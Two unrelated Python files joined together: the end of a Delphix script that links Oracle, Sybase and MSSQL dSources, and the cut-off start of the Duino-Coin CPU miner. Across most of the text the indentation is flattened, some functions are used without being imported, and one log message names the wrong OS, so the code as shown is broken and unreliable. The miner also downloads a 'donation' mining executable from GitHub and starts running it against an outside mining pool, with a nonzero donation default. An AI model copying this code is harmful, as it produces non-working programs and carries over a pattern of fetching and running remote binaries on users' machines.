dx_provision_dsource.py --type sybase --dsource_name dbw2 --ase_user sa --ase_passwd sybase --backup_path /data/db --source_user aseadmin --stage_user aseadmin --stage_repo ASE1570_S2 --src_config dbw2 --env_name aseSource --dx_group Sources --create_bckup
MSSQL:
dx_provision_dsource.py --type mssql --dsource_name mssql_dsource --dx_group Sources --db_passwd delphix --db_user sa --stage_env mssql_target_svr --stage_instance MSSQLSERVER --backup_path \\bckserver\path\backups --backup_loc_passwd delphix --backup_loc_user delphix
dx_provision_dsource.py --type mssql --dsource_name AdventureWorks2014 --dx_group "9 - Sources" --db_passwd delphixdb --db_user aw --stage_env WINDOWSTARGET --stage_instance MSSQLSERVER --logsync --backup_path auto --load_from_backup
Options:
--type <name> dSource type. mssql, sybase or oracle
--ip_addr <name> IP Address of the dSource
--db_name <name> Name of the dSource DB
--env_name <name> Name of the environment where the dSource installed
--db_install_path <name> Location of the installation path of the DB.
--num_connections <name> Number of connections for Oracle RMAN
[default: 5]
--link_now <name> Link the dSource
[default: True]
--files_per_set <name> Configures how many files per set for Oracle RMAN
[default: 5]
--rman_channels <name> Configures the number of Oracle RMAN Channels
[default: 2]
--dx_group <name> Group where the dSource will reside
--create_bckup Create and ingest a new Sybase backup
--db_user <name> Username of the dSource DB
--db_passwd <name> Password of the db_user
--bck_file <name> Fully qualified name of backup file
--port_num <name> Port number of the listener. Default: 1521
--src_config <name> Name of the configuration environment
--ase_passwd <name> ASE DB password
--ase_user <name> ASE username
--backup_path <path> Path to the ASE/MSSQL backups
--sync_mode <name> MSSQL validated sync mode
[TRANSACTION_LOG|FULL_OR_DIFFERENTIAL|FULL|NONE]
--source_user <name> Environment username
--stage_user <name> Stage username
--stage_repo <name> Stage repository
--stage_instance <name> Name of the PPT instance
--stage_env <name> Name of the PPT server
--logsync Enable logsync
  --backup_loc_passwd <passwd>  Password of the shared backup path (--backup_path)
  --backup_loc_user <name>      User of the shared backup path (--backup_path)
--load_from_backup If set, Delphix will try to load the most recent full backup (MSSQL only)
--dsource_name <name> Name of the dSource
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_provision_dsource.log]
-h --help Show this screen.
-v --version Show version.
"""
from __future__ import print_function
VERSION = "v.0.2.0018"
import sys
from os.path import basename
from time import sleep
from time import time
from docopt import DocoptExit
from docopt import docopt
from delphixpy.v1_8_0.exceptions import HttpError
from delphixpy.v1_8_0.exceptions import JobError
from delphixpy.v1_8_0.exceptions import RequestError
from delphixpy.v1_8_0.web import database
from delphixpy.v1_8_0.web import environment
from delphixpy.v1_8_0.web import group
from delphixpy.v1_8_0.web import job
from delphixpy.v1_8_0.web import repository
from delphixpy.v1_8_0.web import sourceconfig
from delphixpy.v1_8_0.web.vo import ASELatestBackupSyncParameters
from delphixpy.v1_8_0.web.vo import ASELinkData
from delphixpy.v1_8_0.web.vo import ASENewBackupSyncParameters
from delphixpy.v1_8_0.web.vo import ASESpecificBackupSyncParameters
from delphixpy.v1_8_0.web.vo import LinkParameters
from delphixpy.v1_8_0.web.vo import MSSqlLinkData
from delphixpy.v1_8_0.web.vo import OracleInstance
from delphixpy.v1_8_0.web.vo import OracleLinkData
from delphixpy.v1_8_0.web.vo import OracleSIConfig
from delphixpy.v1_8_0.web.vo import OracleSourcingPolicy
from delphixpy.v1_8_0.web.vo import SourcingPolicy
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_exception
from lib.DxLogging import print_info
from lib.GetReferences import find_dbrepo
from lib.GetReferences import find_obj_by_name
from lib.GetReferences import get_running_job
from lib.GetSession import GetSession
def create_ora_sourceconfig(engine_name, port_num=1521):
    """
    Create an Oracle sourceconfig and link the dSource

    :param engine_name: Name of the Delphix engine
    :param port_num: Port number of the Oracle listener
    :return: None
    """
create_ret = None
env_obj = find_obj_by_name(
dx_session_obj.server_session, environment, arguments["--env_name"]
)
try:
sourceconfig_ref = find_obj_by_name(
dx_session_obj.server_session, sourceconfig, arguments["--db_name"]
).reference
except DlpxException:
sourceconfig_ref = None
repo_ref = find_dbrepo(
dx_session_obj.server_session,
"OracleInstall",
env_obj.reference,
arguments["--db_install_path"],
).reference
dsource_params = OracleSIConfig()
connect_str = (
"jdbc:oracle:thin:@"
+ arguments["--ip_addr"]
+ ":"
+ str(port_num)
+ ":"
+ arguments["--db_name"]
)
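    # For example, with --ip_addr 192.168.166.11 and --db_name srcDB1 (the
    # values used in the usage examples above) and the default port, this
    # builds: jdbc:oracle:thin:@192.168.166.11:1521:srcDB1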
dsource_params.database_name = arguments["--db_name"]
dsource_params.unique_name = arguments["--db_name"]
dsource_params.repository = repo_ref
dsource_params.instance = OracleInstance()
dsource_params.instance.instance_name = arguments["--db_name"]
dsource_params.instance.instance_number = 1
dsource_params.services = [
{"type": "OracleService", "jdbcConnectionString": connect_str}
]
try:
if sourceconfig_ref is None:
create_ret = link_ora_dsource(
sourceconfig.create(dx_session_obj.server_session, dsource_params),
env_obj.primary_user,
)
        else:
            create_ret = link_ora_dsource(sourceconfig_ref, env_obj.primary_user)
print_info(
"Created and linked the dSource {} with reference {}.\n".format(
arguments["--db_name"], create_ret
)
)
link_job_ref = dx_session_obj.server_session.last_job
link_job_obj = job.get(dx_session_obj.server_session, link_job_ref)
while link_job_obj.job_state not in ["CANCELED", "COMPLETED", "FAILED"]:
print_info(
"Waiting three seconds for link job to complete, and sync to begin"
)
sleep(3)
link_job_obj = job.get(dx_session_obj.server_session, link_job_ref)
# Add the snapsync job to the jobs dictionary
dx_session_obj.jobs[engine_name + "snap"] = get_running_job(
dx_session_obj.server_session,
find_obj_by_name(
dx_session_obj.server_session, database, arguments["--dsource_name"]
).reference,
)
print_debug(
"Snapshot Job Reference: {}.\n".format(
dx_session_obj.jobs[engine_name + "snap"]
)
)
except (HttpError, RequestError) as e:
print_exception("ERROR: Could not create the sourceconfig:\n" "{}".format(e))
sys.exit(1)
def link_ora_dsource(srcconfig_ref, primary_user_ref):
"""
:param srcconfig_ref: Reference to the sourceconfig object
:param primary_user_ref: Reference to the environment user
:return: Reference of the linked dSource
"""
link_params = LinkParameters()
link_params.link_data = OracleLinkData()
link_params.link_data.sourcing_policy = OracleSourcingPolicy()
link_params.name = arguments["--dsource_name"]
link_params.group = find_obj_by_name(
dx_session_obj.server_session, group, arguments["--dx_group"]
).reference
link_params.link_data.compressedLinkingEnabled = True
link_params.link_data.environment_user = primary_user_ref
link_params.link_data.db_user = arguments["--db_user"]
link_params.link_data.number_of_connections = int(arguments["--num_connections"])
    # docopt returns strings, so compare explicitly: bool("False") is True.
    link_params.link_data.link_now = str(
        arguments["--link_now"]).lower() == "true"
link_params.link_data.files_per_set = int(arguments["--files_per_set"])
link_params.link_data.rman_channels = int(arguments["--rman_channels"])
link_params.link_data.db_credentials = {
"type": "PasswordCredential",
"password": arguments["--db_passwd"],
}
link_params.link_data.sourcing_policy.logsync_enabled = True
# link_params.link_data.sourcing_policy.logsync_mode = 'ARCHIVE_REDO_MODE'
link_params.link_data.config = srcconfig_ref
try:
return database.link(dx_session_obj.server_session, link_params)
except (RequestError, HttpError) as e:
print_exception(
"Database link failed for {}:\n{}\n".format(arguments["--dsource_name"], e)
)
sys.exit(1)
def link_mssql_dsource(engine_name):
"""
Link an MSSQL dSource
"""
link_params = LinkParameters()
link_params.name = arguments["--dsource_name"]
link_params.link_data = MSSqlLinkData()
try:
env_obj_ref = find_obj_by_name(
dx_session_obj.server_session, environment, arguments["--stage_env"]
).reference
link_params.link_data.ppt_repository = find_dbrepo(
dx_session_obj.server_session,
"MSSqlInstance",
env_obj_ref,
arguments["--stage_instance"],
).reference
link_params.link_data.config = find_obj_by_name(
dx_session_obj.server_session, sourceconfig, arguments["--dsource_name"]
).reference
link_params.group = find_obj_by_name(
dx_session_obj.server_session, group, arguments["--dx_group"]
).reference
except DlpxException as e:
print_exception(
"Could not link {}: {}\n".format(arguments["--dsource_name"], e)
)
sys.exit(1)
if arguments["--backup_path"] != "auto":
link_params.link_data.shared_backup_location = arguments["--backup_path"]
if arguments["--backup_loc_passwd"]:
link_params.link_data.backup_location_credentials = {
"type": "PasswordCredential",
"password": arguments["--backup_loc_passwd"],
}
link_params.link_data.backup_location_user = arguments["--backup_loc_user"]
link_params.link_data.db_credentials = {
"type": "PasswordCredential",
"password": arguments["--db_passwd"],
}
link_params.link_data.db_user = arguments["--db_user"]
link_params.link_data.sourcing_policy = SourcingPolicy()
if arguments["--load_from_backup"]:
link_params.link_data.sourcing_policy.load_from_backup = True
if arguments["--sync_mode"]:
        link_params.link_data.validated_sync_mode = arguments["--sync_mode"]
if arguments["--logsync"]:
link_params.link_data.sourcing_policy.logsync_enabled = True
try:
database.link(dx_session_obj.server_session, link_params)
dx_session_obj.jobs[engine_name] = dx_session_obj.server_session.last_job
dx_session_obj.jobs[engine_name + "snap"] = get_running_job(
dx_session_obj.server_session,
find_obj_by_name(
dx_session_obj.server_session, database, arguments["--dsource_name"]
).reference,
)
except (HttpError, RequestError, JobError) as e:
print_exception(
"Database link failed for {}:\n{}\n".format(arguments["--dsource_name"], e)
)
def link_ase_dsource(engine_name):
"""
Link an ASE dSource
"""
link_params = LinkParameters()
link_params.name = arguments["--dsource_name"]
link_params.link_data = ASELinkData()
link_params.link_data.db_credentials = {
"type": "PasswordCredential",
"password": arguments["--ase_passwd"],
}
link_params.link_data.db_user = arguments["--ase_user"]
link_params.link_data.load_backup_path = arguments["--backup_path"]
if arguments["--bck_file"]:
link_params.link_data.sync_parameters = ASESpecificBackupSyncParameters()
bck_files = (arguments["--bck_file"]).split(" ")
link_params.link_data.sync_parameters.backup_files = bck_files
elif arguments["--create_bckup"]:
link_params.link_data.sync_parameters = ASENewBackupSyncParameters()
else:
link_params.link_data.sync_parameters = ASELatestBackupSyncParameters()
try:
link_params.group = find_obj_by_name(
dx_session_obj.server_session, group, arguments["--dx_group"]
).reference
env_user_ref = link_params.link_data.stage_user = find_obj_by_name(
dx_session_obj.server_session, environment, arguments["--env_name"]
).primary_user
link_params.link_data.staging_host_user = env_user_ref
link_params.link_data.source_host_user = env_user_ref
link_params.link_data.config = find_obj_by_name(
dx_session_obj.server_session, sourceconfig, arguments["--src_config"]
).reference
link_params.link_data.staging_repository = find_obj_by_name(
dx_session_obj.server_session, repository, arguments["--stage_repo"]
).reference
except DlpxException as e:
print_exception(
"Could not link {}: {}\n".format(arguments["--dsource_name"], e)
)
sys.exit(1)
try:
dsource_ref = database.link(dx_session_obj.server_session, link_params)
dx_session_obj.jobs[engine_name] = dx_session_obj.server_session.last_job
dx_session_obj.jobs[engine_name + "snap"] = get_running_job(
dx_session_obj.server_session,
find_obj_by_name(
dx_session_obj.server_session, database, arguments["--dsource_name"]
).reference,
)
print("{} sucessfully linked {}".format(
dsource_ref, arguments["--dsource_name"]
))
except (RequestError, HttpError) as e:
print_exception(
"Database link failed for {}:\n{}".format(arguments["--dsource_name"], e)
)
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target=func, args=args, kwargs=kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine):
"""
This function actually runs the jobs.
Use the @run_async decorator to run this function asynchronously.
This allows us to run against multiple Delphix Engine simultaneously
engine: Dictionary of engines
"""
jobs = {}
try:
# Setup the connection to the Delphix Engine
dx_session_obj.serversess(
engine["ip_address"], engine["username"], engine["password"]
)
except DlpxException as e:
        print_exception(
            "\nERROR: Engine {} encountered an error while establishing a "
            "session:\n{}\n".format(engine["hostname"], e)
        )
sys.exit(1)
thingstodo = ["thingtodo"]
try:
with dx_session_obj.job_mode(single_thread):
while len(dx_session_obj.jobs) > 0 or len(thingstodo) > 0:
if len(thingstodo) > 0:
if arguments["--type"].lower() == "oracle":
                        # Pass the listener port through; docopt leaves it
                        # as None when --port_num is not given.
                        create_ora_sourceconfig(
                            engine["hostname"],
                            port_num=arguments["--port_num"] or 1521)
elif arguments["--type"].lower() == "sybase":
link_ase_dsource(engine["hostname"])
elif arguments["--type"].lower() == "mssql":
link_mssql_dsource(engine["hostname"])
thingstodo.pop()
# get all the jobs, then inspect them
i = 0
for j in dx_session_obj.jobs.keys():
job_obj = job.get(
dx_session_obj.server_session, dx_session_obj.jobs[j]
)
print_debug(job_obj)
print_info(
"{}: Provisioning dSource: {}".format(
engine["hostname"], job_obj.job_state
)
)
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it
# from the
# running jobs list.
del dx_session_obj.jobs[j]
elif job_obj.job_state in "RUNNING":
# If the job is in a running state, increment the
# running job count.
i += 1
print_info("{}: {:d} jobs running.".format(engine["hostname"], i))
# If we have running jobs, pause before repeating the
# checks.
if len(dx_session_obj.jobs) > 0:
sleep(float(arguments["--poll"]))
except (HttpError, RequestError, JobError, DlpxException) as e:
print_exception(
"ERROR: Could not complete ingesting the source " "data:\n{}".format(e)
)
sys.exit(1)
def run_job():
"""
This function runs the main_workflow aynchronously against all the servers
specified
"""
# Create an empty list to store threads we create.
threads = []
engine = None
# If the --all argument was given, run against every engine in dxtools.conf
if arguments["--all"]:
print_info("Executing against all Delphix Engines in the dxtools.conf")
try:
# For each server in the dxtools.conf...
for delphix_engine in dx_session_obj.dlpx_engines:
                engine = dx_session_obj.dlpx_engines[delphix_engine]
# Create a new thread and add it to the list.
threads.append(main_workflow(engine))
except DlpxException as e:
print("Error encountered in run_job():\n%s" % (e))
sys.exit(1)
elif arguments["--all"] is False:
# Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments["--engine"]:
try:
engine = dx_session_obj.dlpx_engines[arguments["--engine"]]
print_info(
"Executing against Delphix Engine: {}\n".format(
(arguments["--engine"])
)
)
except (DlpxException, RequestError, KeyError) as e:
raise DlpxException(
"\nERROR: Delphix Engine {} cannot be "
"found in {}. Please check your value "
"and try again. Exiting.\n".format(
arguments["--engine"], config_file_path
)
)
else:
# Else search for a default engine in the dxtools.conf
for delphix_engine in dx_session_obj.dlpx_engines:
if dx_session_obj.dlpx_engines[delphix_engine]["default"] == "true":
engine = dx_session_obj.dlpx_engines[delphix_engine]
print_info(
"Executing against the default Delphix Engine "
"in the dxtools.conf: %s"
% (dx_session_obj.dlpx_engines[delphix_engine]["hostname"])
)
break
if engine is None:
raise DlpxException("\nERROR: No default engine found. Exiting")
# run the job against the engine
threads.append(main_workflow(engine))
# For each thread in the list...
for each in threads:
# join them back together so that we wait for all threads to complete
# before moving on
each.join()
def time_elapsed():
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
"""
elapsed_minutes = round((time() - time_start) / 60, 1)
return elapsed_minutes
def main(argv):
# We want to be able to call on these variables anywhere in the script.
global single_thread
global usebackup
global time_start
global config_file_path
global database_name
global dx_session_obj
global debug
if arguments["--debug"]:
debug = True
try:
dx_session_obj = GetSession()
logging_est(arguments["--logdir"])
print_debug(arguments)
time_start = time()
engine = None
single_thread = False
config_file_path = arguments["--config"]
# Parse the dxtools.conf and put it into a dictionary
dx_session_obj.get_config(config_file_path)
# This is the function that will handle processing main_workflow for
# all the servers.
run_job()
elapsed_minutes = time_elapsed()
print_info(
"script took {} minutes to get this far.".format(str(elapsed_minutes))
)
# Here we handle what we do when the unexpected happens
except SystemExit as e:
"""
This is what we use to handle our sys.exit(#)
"""
sys.exit(e)
except HttpError as e:
"""
We use this exception handler when our connection to Delphix fails
"""
print_exception(
"Connection failed to the Delphix Engine"
"Please check the ERROR message below:\n{}".format(e)
)
sys.exit(1)
except JobError as e:
"""
We use this exception handler when a job fails in Delphix so that
we have actionable data
"""
elapsed_minutes = time_elapsed()
print_exception("A job failed in the Delphix Engine")
print_info(
"{} took {:.2f} minutes to get this far:\n{}\n".format(
basename(__file__), elapsed_minutes, e
)
)
sys.exit(3)
except KeyboardInterrupt:
"""
We use this exception handler to gracefully handle ctrl+c exits
"""
print_debug("You sent a CTRL+C to interrupt the process")
elapsed_minutes = time_elapsed()
print_info(
"{} took {:.2f} minutes to get this far\n".format(
basename(__file__), elapsed_minutes
)
)
except:
"""
Everything else gets caught here
"""
print_exception(sys.exc_info()[0])
elapsed_minutes = time_elapsed()
print_info(
"{} took {:.2f} minutes to get this far\n".format(
basename(__file__), elapsed_minutes
)
)
sys.exit(1)
if __name__ == "__main__":
try:
# Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
# Feed our arguments to the main function, and off we go!
main(arguments)
except DocoptExit as e:
# print 'Exited because options were not specified: {}\n'.format(e)
print(e)
|
PC_Miner.py | #!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.4)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path, system
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
def install(package):
# Install pip package automatically
check_call([sys.executable, "-m", "pip", "install", package])
execl(sys.executable, sys.executable, *sys.argv)
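# Note (added): execl replaces the current interpreter process with a fresh
# one running the same script, so the freshly pip-installed package becomes
# importable on restart; no code after the execl call ever executes.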
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Requests is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"requests\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("requests")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed. "
+ "Continuing without xxhash support.")
xxhash_enabled = False
# Global variables
minerVersion = "2.4" # Version number
timeout = 15 # Socket timeout
resourcesFolder = "PCMiner_" + str(minerVersion) + "_resources"
donatorrunning = False
debug = "n"
rigIdentifier = "None"
requestedDiff = "NET"
algorithm = "DUCO-S1"
serveripfile = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/gh-pages/"
+ "serverip.txt") # Serverip file
config = ConfigParser()
donationlevel = 0
thread = []
totalhashrate_mean = []
Service = False
# Create resources folder if it doesn't exist
if not path.exists(resourcesFolder):
mkdir(resourcesFolder)
# Check if languages file exists
if not Path(resourcesFolder + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
r = requests.get(url)
with open(resourcesFolder + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(resourcesFolder + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
if not Path(resourcesFolder + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(resourcesFolder + "/Miner_config.cfg")
lang = config["miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
def getString(string_name):
# Get string from the language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debugOutput(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
prettyPrint(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requestedDiff == "LOW":
diffName = getString("low_diff_short")
elif requestedDiff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(minerVersion)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debugOutput("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donationlevel))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " @ "
+ diffName)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rigIdentifier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ ("Running as service: ")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(Service))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
if osname == "nt":
# Initial miner executable section
if not Path(resourcesFolder + "/Donate_executable.exe").is_file():
debugOutput(
"OS is Windows, downloading developer donation executable")
url = ("https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/useful-tools/"
+ "DonateExecutableWindows.exe?raw=true")
r = requests.get(url)
with open(resourcesFolder + "/Donate_executable.exe", "wb") as f:
f.write(r.content)
elif osname == "posix":
# Initial miner executable section
if not Path(resourcesFolder + "/Donate_executable").is_file():
debugOutput(
"OS is Windows, downloading developer donation executable")
url = ("https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/useful-tools/"
+ "DonateExecutableLinux?raw=true")
r = requests.get(url)
with open(resourcesFolder + "/Donate_executable", "wb") as f:
f.write(r.content)
def loadConfig():
# Config loading section
global username
global efficiency
global donationlevel
global debug
global threadcount
global requestedDiff
global rigIdentifier
global lang
global algorithm
# Initial configuration
if not Path(resourcesFolder + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ resourcesFolder
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_username")
+ Fore.RESET
+ Style.BRIGHT)
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_intensity")
+ Fore.RESET
+ Style.BRIGHT)
threadcount = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_threads")
+ str(cpu_count())
+ "): "
+ Fore.RESET
+ Style.BRIGHT)
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - "
+ getString("low_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - "
+ getString("medium_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "3"
+ Style.NORMAL
+ " - "
+ getString("net_diff"))
requestedDiff = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_difficulty")
+ Fore.RESET
+ Style.BRIGHT)
rigIdentifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_identifier")
+ Fore.RESET
+ Style.BRIGHT)
if rigIdentifier == "y" or rigIdentifier == "Y":
rigIdentifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_name")
+ Fore.RESET
+ Style.BRIGHT)
else:
rigIdentifier = "None"
donationlevel = "0"
if osname == "nt" or osname == "posix":
donationlevel = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_donation_level")
+ Fore.RESET
+ Style.BRIGHT)
# Check whether efficiency is correct
efficiency = sub(r"\D", "", efficiency)
if efficiency == "":
efficiency = 95
elif float(efficiency) > int(100):
efficiency = 100
elif float(efficiency) < int(1):
efficiency = 1
# Check whether threadcount is correct
threadcount = sub(r"\D", "", threadcount)
if threadcount == "":
threadcount = cpu_count()
elif int(threadcount) > int(10):
threadcount = 10
elif int(threadcount) < int(1):
threadcount = 1
# Check whether algo setting is correct
if algorithm == "2":
algorithm = "XXHASH"
else:
algorithm = "DUCO-S1"
# Check whether diff setting is correct
if requestedDiff == "1":
requestedDiff = "LOW"
elif requestedDiff == "2":
requestedDiff = "MEDIUM"
else:
requestedDiff = "NET"
# Check whether donationlevel is correct
donationlevel = sub(r"\D", "", donationlevel)
if donationlevel == "":
donationlevel = 1
elif float(donationlevel) > int(5):
donationlevel = 5
elif float(donationlevel) < int(0):
donationlevel = 0
# Format data
config["miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requestedDiff": requestedDiff,
"donate": donationlevel,
"identifier": rigIdentifier,
"algorithm": algorithm,
"language": lang,
"debug": "n"}
# Write data to configfile
with open(resourcesFolder + "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
# Calculate efficiency for later use with the sleep function
efficiency = (100 - float(efficiency)) * 0.01
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(resourcesFolder + "/Miner_config.cfg")
username = config["miner"]["username"]
efficiency = config["miner"]["efficiency"]
threadcount = config["miner"]["threads"]
requestedDiff = config["miner"]["requestedDiff"]
donationlevel = config["miner"]["donate"]
algorithm = config["miner"]["algorithm"]
rigIdentifier = config["miner"]["identifier"]
debug = config["miner"]["debug"]
# Calculate efficiency for use with the sleep function
efficiency = (100 - float(efficiency)) * 0.01
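# Worked example of the efficiency mapping above (added sketch; the _demo_*
# name is illustrative and never called by the miner): a user-entered
# efficiency of 95 is stored as (100 - 95) * 0.01 = 0.05, and the mining loop
# later sleeps stored * 5 = 0.25 s per pass (see the Thread function below).
def _demo_efficiency_sleep(entered=95):
stored = (100 - float(entered)) * 0.01
return stored * 5  # seconds slept per mining-loop pass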
def Donate():
global donationlevel
global donatorrunning
global donateExecutable
if osname == "nt":
cmd = (
"cd "
+ resourcesFolder
+ "& Donate_executable.exe "
+ "-o stratum+tcp://xmg.minerclaim.net:7008 "
